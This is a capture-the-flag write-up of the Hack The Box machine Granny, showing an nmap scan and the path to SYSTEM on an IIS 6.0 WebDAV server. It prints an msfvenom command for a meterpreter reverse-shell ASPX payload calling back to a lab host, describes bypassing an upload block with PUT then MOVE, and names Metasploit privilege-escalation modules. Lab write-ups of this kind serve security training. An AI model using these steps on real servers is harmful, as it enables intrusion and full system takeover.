Published on

Hack The Box - Granny

We are going to pwn Granny from Hack The Box.

Link : https://www.hackthebox.eu/home/machines/profile/14

Lets Begin with our Initial Nmap Scan.

Nmap Scan Results:

80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-ntlm-info: 
|   Target_Name: GRANNY
|   NetBIOS_Domain_Name: GRANNY
|   NetBIOS_Computer_Name: GRANNY
|   DNS_Domain_Name: granny
|   DNS_Computer_Name: granny
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Date: Sat, 07 Mar 2020 04:33:20 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_  WebDAV type: Unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (90%), Microsoft Windows Server 2003 SP2 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2003 SP2 (89%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows 2000 SP4 (85%), Microsoft Windows XP SP2 or Windows Server 2003 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP:

The webpage is running as ISI 6.0 from Nmap results. Like Grandpa.br/

The Nmap webdav-scan revealed that we have PUT options. I tried davtest.

I opened one of the PUT link to see whats going.I captured the burp request. We need to know the file extension to upload to get reverse shell.And it is Powered by ASP.NET so our payload must be in .asp or .aspx.

Now we need create a payload and PUT to the website. I used msfvenom for creating payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.22 LPORT=1234 -f aspx

We I tried uploading the payload but I got 403 Forbidden.

We know the website have lot of Allowed Methods so I checked what MOVE will do?

Since .aspx is not allowed to upload we can upload someother file and change the extension back to .aspx.

I used .html to upload the same payload, now we can use Move to change its extension.

201 Created It worked, Extension changed.

Started my Listener in Msfconsole br/

Privilege Escalation:

We can try try local_exploit_suggester before that, need to migrate process inorder to make it stable. So I won't face any errors while using any exploit.

Let's background this session and Use local_exploit_suggester

So it's like Grandpa Box, same exploits. I used the same windows/local/ppr_flatten_rec

Got NT AUTHORITY\SYSTEM